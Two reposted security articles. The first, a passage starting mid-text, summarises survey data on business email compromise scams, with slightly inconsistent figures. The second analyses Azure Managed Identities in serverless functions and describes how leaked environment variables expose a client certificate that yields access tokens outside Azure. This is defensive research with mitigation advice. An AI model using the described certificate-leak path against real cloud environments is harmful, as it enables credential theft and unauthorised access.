The results from this study offer a look at how security influencers and decision-makers are taking BEC into account when formulating their spending plans for the next 12 months. For example, while just 46% of organizations said they considered protecting against BEC attacks “important” or “extremely important” 12 months ago, 76% said they considered it important or extremely important today.

80%

Organizations indicating that protecting against BEC attacks in 2023 is of high importance

The data also shows that three-fifths of organizations in the study view protecting against BEC attacks as one of their top five security priorities.

62%

Organizations ranking protecting against BEC attacks as one of their top five priorities.

How BEC Attacks Fly Under the Radar

But what makes BEC attacks so dangerous when compared with other forms of cyberattacks? And why are they harder to stop?

BEC is a specialized type of phishing attack that relies on social engineering. They often use a proven pretexting technique to engineer a quick introduction and establish a believable scenario in order to manipulate the victim to take a specific action.

While these attacks can target employees at any level of an organization, they generally start with an attacker impersonating a person with authority, such as a CEO or CFO, a manager, or a supplier. The attacker uses the authority figure’s identity to start a chain of plausible (but fake) requests to gain monetary payment. This typically involves instructing someone in accounts payable, someone in HR or even someone with a company credit card to pay a fake invoice, transfer funds, send gift cards or make payroll payouts. The urgent tone of these messages encourages the victim to respond or act quickly, bypassing any checks and balances that may be in place.

Compared with other forms of cyberattacks, BEC attacks are among the hardest to detect because the threat signals are far less obvious. Relying on trickery and impersonation, the approach is very subtle, and the actual delivery generally doesn’t use weaponized URLs or malicious attachments, which are easily detected.

In addition, the email content and the delivery mechanism are usually of higher quality and often tailored to target a specific person or persons. With little to no apparent sign of a threat, these messages can bypass most email security filters to reach the inbox — and the absence of any sort of alert, such as a contextual warning advising them to exercise caution, leaves the victim more vulnerable to falling for the scam.

Because so many of these scams are successful, their use has grown dramatically — today, roughly 80% of companies targeted by BEC attacks each year. While there isn’t much you can do to avoid being targeted, there’s plenty you can do to safeguard your organization’s finances. To learn more about BEC attacks and how to stop them, check out our webinar, “Can You Stop the Imposters in Your Inbox?”

Source :
https://blog.sonicwall.com/en-us/2022/06/bec-attacks-can-you-stop-the-imposters-in-your-inbox/

An Analysis of Azure Managed Identities Within Serverless Environments

We examine Azure’s Managed Identities service and its security capability in a threat model as developers’ go-to feature for managing secrets and credentials.

Authentication and authorization play crucial parts when securing resources. Authentication verifies that the service or user accessing the secured resources has provided valid credentials, while authorization makes sure that they have sufficient permissions for the request itself.

Broken Access Control is listed among the top 10 OWASP prevalent web application issues from 2017 to 2021, and we have previously written about the importance of secrets management used for authentication. This occurs when an unauthorized user can access, modify, delete, or perform actions within an application or system that is outside the set permissions or policies, malicious or unintended. Broken access control has become the number one concern in the organization’s list, and in this article, we discuss Azure’s Managed Identities service inside the cloud service provider (CSP) to tackle the said web application issue.

Managing system and user identities

Managed Identities for Azure allows users to authenticate certain services available within the CSP. This is done by providing the cloud application a token used for service authentication. We distinguish between two types of managed identities: system-assigned identities and user-assigned identities. To differentiate, system-assigned identities are restricted from one to the resource, which means that different user roles can’t be applied to the same resource. On the other hand, user-managed identities solve this problem and we can imagine them as user roles.

Figure 1. Usage of Managed Identities

For instance, we want to use an Azure storage account within a serverless application for saving our application records. For this purpose, we decided to use a system-managed identity.

This practically means:

Enable managed identities inside a serverless function
Grant serverless functions the necessary permissions for storage account access

Figure 2. Enabling managed identities in a serverless function

After that, we can start using the managed identity for authentication to the storage account. In the following sections, we will look at how the managed identities interface is technically implemented within the serverless environment and the corresponding security implications based on our recent research.

Managing identities in the serverless environment

To make it work, the serverless environment runs a special .NET application process named “dotnet TokenServiceContainer.dll.” This process listens on a localhost and port 8081 to accept HTTP requests. The endpoint for requesting a token is http://localhost:8081/msi/token, and the required parameters specifies that the API version used and resource identifier for which the service requests the token. Optionally, it uses “client_id,” which is a parameter used when a managed user identity token is requested. The request also needs a specific X-IDENTITY-HEADER, and the needed value is present inside IDENTITY_HEADER or an MSI_SECRET environmental variable.

After receiving this token request, the request is delegated to the endpoint within the CSP (another service) and provides the requested token. The endpoint is publicly available and is a part of the *.identity.azure.net subdomain based on the region of the serverless application. By design and public access to the endpoint the service requires authentication, and this is done using a X509 client certificate. This certificate is unique to the specific application ID (meaning the serverless function has a one-to-one pairing of certificate and app ID) and valid for 180 days. If the request is successful, it returns a JSON response with a bearer token valid for one day.

Figure 3. Managed identities inside serverless environments

From that perspective, the security standard is high, which is expected from a CSP service. However, there is one hidden danger and that is the certificate itself. The certificate can be leaked by leaking environmental variables.

The Managed Service Identity (MSI) certificate is part of the encrypted container context, which can be accessed inside using a URL-specified CONTAINER_START_CONTEXT_SAS_URI and decrypted using the CONTAINER_ENCRYPTION_KEY variable. Once the certificate is leaked, it can be used to obtain the token outside the scope of CSP services and successfully used for publicly available service endpoints as it would be called from the CSP service.

Threat model and scenario

Figure 4. PoC of getting token using leaked environmental variables from Managed Identity service

At this point, we should emphasize that to be able to abuse the retained token, a certain factor (or malicious actor) must first leak these environmental variables and there must be an assigned role within the requested resource, the pre-requisites being the identities enabled and the role set for the application. This means there are no default roles unless explicitly specified within the CSP settings.

However, as this example of potential compromise shows from a gap leaking environmental variables of a Linux endpoint, using environmental variables for storing sensitive information is not a valid secure approach as they are by default inherited into the child process. Considering that the information is available inside the environment itself and that the certificate contains all the information provided, the endpoint for getting the token now becomes publicly available. A threat actor can get the authentication token outside of the CSP’s service and get all the permissions as the original user.

In this example, the token provider service within the serverless environment is running under a different user. Why is the client certificate available not only for this user in the form of a file with permissions only for that user? This allows a compromised serverless function to leak it and obtain the access token from the external service. But while the unauthorized user can’t get additional privileges other than what the function has, this is enough to conduct activities inside the environment that can have a range of damaging effects. By moving a client certificate into the security boundary of token service user and setting access permissions for the token service user as read-only, we guarantee that even in case of a compromise, the client certificate could not be leaked and used outside the CSP service without additional lateral movement.

The security chain is only as strong as its weakest parts. And while CSP services are not inherently insecure, small design weaknesses put together with improper user configurations could lead to bigger, more damaging consequences. Design applications, environments, and all their related variables with security in mind. If possible, avoid using environmental variables. Following best security practices such as applying the principle of least privilege helps to mitigate the consequences of a breach.

Source :
https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/an-analysis-of-azure-managed-identities-within-serverless-environments